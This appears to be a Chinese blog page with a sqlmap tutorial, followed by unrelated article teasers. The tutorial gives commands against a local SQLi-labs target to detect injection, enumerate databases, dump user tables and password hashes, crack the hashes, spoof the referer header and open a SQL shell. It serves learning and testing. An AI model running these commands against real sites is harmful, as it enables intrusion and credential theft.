sqlmap各个命令的解释及其基本用法

各个命令的用法

-h,--help    Show basic help message and exit(显示基本帮助消息并退出)

-hh        Show advanced help message and exit(显示高级帮助信息并退出)

--version    Show program's version number and exit(显示程序的版本号并退出)

 -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")(目标URL)

Sqlmap的用法(如果是get型注入可以直接输入url进行操作,如果是post注入的则需要用burp抓包将抓包的内容放在.txt文档里面用文档进行查询)

1.判断是否存在注入

python sqlmap.py -u http://127.0.0.3/Less-1/?id=1

也可以加入--batch

python sqlmap.py -u http://127.0.0.3/Less-1/?id=1 --batch

直接跳过是否的选择

python sqlmap.py -u “http://127.0.0.3/Less-1/?id=1&id=2” --batch

如果存在多个参数时要加双引号

如果存在注入type里面会显示注入类型

2.用.txt文件判断是否存在注入

python sqlmap.py -r C:\Users\gaoli\Desktop\2.txt

-p 可以去指定检测的参数

查看当前用户下存在的所有数据库(--dbs)

sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --dbs

获取当前数据库(--current-db)

sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --current-db

获取数据库中的表名(-D security(表示当前数据库名) --tables 这里是因为查到了当前数据库是security)

sqlmap.py -r C:\Users\gaoli\Desktop\2.txt -D security --tables

获取当前数据库表中的字段(–D security  –T users --columns)

sqlmap.py -r C:\Users\gaoli\Desktop\2.txt -D security -T users --columns

获取字段的内容(-D security -T users -C id,usernmae,password --dump)

sqlmap.py -r C:\Users\gaoli\Desktop\2.txt -D security -T users -C id,usernmae,password --dump

-D     database      数据库名     --dbs 查询数据库

-T     table         表名          -D 数据库名 --tables

-C     column       字段名        -D 数据库名 -T 表名 --columns

查询字段里面的内容    -D 数据库名 -T 表名 -C 字段名(username,password,id) --dump

获取数据库中所有的用户(--users)

sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --users

获取用户的密码(--passwords)

sqlmap>sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --passwords

这里的用户密码是加密了的可以用CMD5进行解密

--level 5:探测用户等级

参数 –level 5指需要执行的测试等级,一共有5个等级(1-5),可以不用加level,默认是1.sqlmap使用payload可以在xml/payloads.xml中看到,也可以根据相应的格式添加自己的payload,其中5级包含的payload最多,会自动破解出cookie、新方法、等头部注入。当然,level 5的运行速度也比较慢。

这个参数会影响测试的注入点,get和post的数据都会进行测试,http cookie在level为2的时候就会测试,http user-agent/referer头在level为3的时候就会测试。总之,在不确定哪个payload或者参数为诸如点时,为了保证全面性,建议使用高的level值。

查看当前用户是否为管理权限(--is-dba)

sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --is-dba

显示true表示当前用户是管理权限,显示false则表示当前用户没有管理权限

sqlmap可以在请求中伪造http中的referer,当level参数设定在3及3以上时,会尝试对referer头注入。可以使用referer命令来欺骗(--referer 百度一下,你就知道 )

sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --referer http://www.baidu.com

用来欺骗是百度在执行

运行自定义sql语句(--sql-shell)

sqlmap.py -r C:\Users\gaoli\Desktop\2.txt --sql-shell

sql-shell> 如果出现这个则证明已经执行成功

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/272025.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

【Vue UI组件库】

Vue UI组件库 1 移动端常用UI组件库2 PC端常用UI组件库2.1 Element UI 1 移动端常用UI组件库 Vant:https://youzan.github.io/vantCube UI:https://didi.github.io/cube-uiMint UI:http://mint-ui.github.io 2 PC端常用UI组件库 Element U…

带你学C语言~指针(3)

目录 ✍0.前言 🚀1.字符指针变量 🚅2.数组指针变量 🐱‍🏍2.1.数组指针变量是什么 🐱‍🏍2.2数组指针变量怎么初始化 🚢3.二维数组传参的本质 🚀4.函数指针变量 ✈4.1函数指…

Ubuntu-22.04编译安装FLTK

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、FLTK是什么?二、下载源代码三、准备编译环境四、编译五、运行测试程序六、Demo总结 前言 最近在研究FLTK,突然对它感了兴趣&#x…

猫粮选择困难?5款性价比高的主食冻干品牌推荐

近年来,冻干猫粮作为热门的高品质猫粮,受到了许多追求纯天然、健康食品的铲屎官的关注。萌新铲屎官就很疑惑了冻干猫粮可以代替猫粮作为主食吗?冻干猫粮真就那么好吗? 那么今天作为一个宠物店店长,跟大家一起聊聊各种…

UG模型的显示与隐藏

在UG中,除了通过图层的方式控制模型的显示与隐藏外,还可以直接通过显示与隐藏命令,位置在菜单-编辑-显示与隐藏,需要注意的是这些命令只能对可视图层中的模型进行控制 显示与隐藏:ctrl w 可以通过模型的类别&#xf…

系统架构设计师笔记

第1章计算机组成与体系结构 1.1.1计算机硬件的组成 (1)控制器。控制器是分析和执行指令的部件,也是统一指挥并控制计算机各部件协调工作的中心部件,所依据的是机器指令。控制器的组成包含如下。 ①程序计数器PC:存储下…

忻府区政协主席郭新和带队视察洁晋发电环保教育基地中国流动科技博物馆展厅

忻府区政协主席郭新和带队视察洁晋发电环保教育基地中国流动科技博物馆展厅 2023年12月5日,忻府区政协主席郭新和带队视察中国流动科技博物馆展览情况。 郭新和一行来到位于忻州市洁晋发电有限公司环保教育基地的中国流动科技馆忻府区展厅。展厅内配备了科普知识展…

2023 年备受瞩目的向量数据库赛道盘点出炉

近日,Zilliz 捷报频传,先后斩获来自极客公园、量子位、界面科技、OSCHINA 等行业头部媒体所颁发的奖项以及荣登相应榜单。 接下来,就让我们一起来了解一下这些颇受业界认可的奖项及榜单~ 2023 中国创新力量 50 榜单 【2023 中国创…

托盘在线缠绕机

托盘在线式缠绕机是适应流水线作业的包装机械,很适合现代化企业的自动化包装的需要,对提高包装效率,降低劳动强度,有效利用人力资源,起到较好的作用。目前,托盘在线缠绕机已经在化工、电子、食品、饮料、造…

小李的2023年度读书盘点

小李的2023年度读书盘点 主题读书 1、纪实文学 和去年一样,依然以上海译文出版社的“译文纪实”系列图书为主。该系列大部分图书质量说得过去,今年读的几本中,一本不及格(3/5星以下),《打工女孩》&#…

Facebook企业户与个人户的区别是什么?一文带你看懂Facebook企业户!

Facebook 作为最大的社交平台之一,吸引了大多数的卖家进行投放广告,并且投放广告的效果也是很不错的。Facebook个人账户大家都不陌生,那么 Facebook 有企业户吗?当然是有的,Facebook 有针对企业和品牌的专门广告账户&a…

10 种最佳排序算法原理及代码

什么是排序算法? 从本质上讲,排序算法是一种计算机程序,它将数据组织成特定的顺序,例如字母顺序或数字顺序,通常是升序或降序。 排序算法能干啥? 排序算法主要用于以有效的方式重新排列大量数据,以便更容易地进行搜…

围栏中心点

后端返回的数据格式是 [{height: 0,lat: 30.864277169098443,lng:114.35252972024682}{height: 1,lat: 30.864277169098443,lng:114.35252972024682}.........]我们要转换成 33.00494857612568,112.53886564762979;33.00307854503083,112.53728973842954;33.00170296814311,11…

MySQL日期查询 今天、明天、本月、下月、星期、本周第一天、本周最后一天、本周七天日期

文章目录 今天日期明天日期本月第一天本月最后一天下个月第一天当前月已过几天当前月天数当前月所有日期获取星期本周第一天本周最后一天获取本周的七天日期今天日期 select curdate()明天日期 select DATE_SUB(curdate(),INTERVAL -1 DAY) AS tomorrow本月第一天 select da…

阿春的450MT售价提前大曝光,符合你的预期吗?

最新消息,阿春的450MT在国外的官网上已经曝光,售价8990澳元,折合RMB 4.35万元,毕竟对他们来说这也是进口车嘛。那么从这个售价可以看出一些端倪,同平台的450SR海外售价8290澳元,450MT和450SR差价700澳元&am…

UI自动化测试的痛点

当我们找工作的时候查看招聘信息发现都需要有自动化测试经验,由此看来测试人员不会一点自动化测试技术都不好意思说自己是做软件测试的。大部分测试人员也都是从使用自动化测试工具、录制回放、测试脚本、开发小工具入门自动化测试的,然后在慢慢的接触 U…

idea设置自定义快捷键定义代码块

文章目录 idea设置自定义快捷键定义代码块1、首先打开setting然后找到editor中的live templates2、点击加号先新建一个Mygroup3、然后就可以按下图添加自己的group进行代码块快捷键的设置了 idea设置自定义快捷键定义代码块 1、首先打开setting然后找到editor中的live templat…

RK3568驱动指南|第八篇 设备树插件-第84章设备树插件参考资料介绍

瑞芯微RK3568芯片是一款定位中高端的通用型SOC,采用22nm制程工艺,搭载一颗四核Cortex-A55处理器和Mali G52 2EE 图形处理器。RK3568 支持4K 解码和 1080P 编码,支持SATA/PCIE/USB3.0 外围接口。RK3568内置独立NPU,可用于轻量级人工…

基于合宙Air700E的4G环境监测节点(温湿度、气压等数据),通过MQTT上传阿里云物联网平台

基于合宙Air700E的4G环境监测节点(温度、湿度、气压等数据),通过MQTT上传阿里云物联网平台。 介绍 合宙Air700E 4G模块读取传感器(温湿度、气压等)数据并通过MQTT协议上传阿里云物联网平台,数据也会同时显…

最新9.9付费进群saas系统源码已修复定位及已知bug

距上版,优化一下功能,修复了已知问题及定位功能 1.九块九加群微信裂变人脉吃瓜宝妈同城相亲交友取图表情包 2.支持创建各种付费群,表情,吃瓜,创业,资源等等 3.支付对接第三方易支付,随便一家…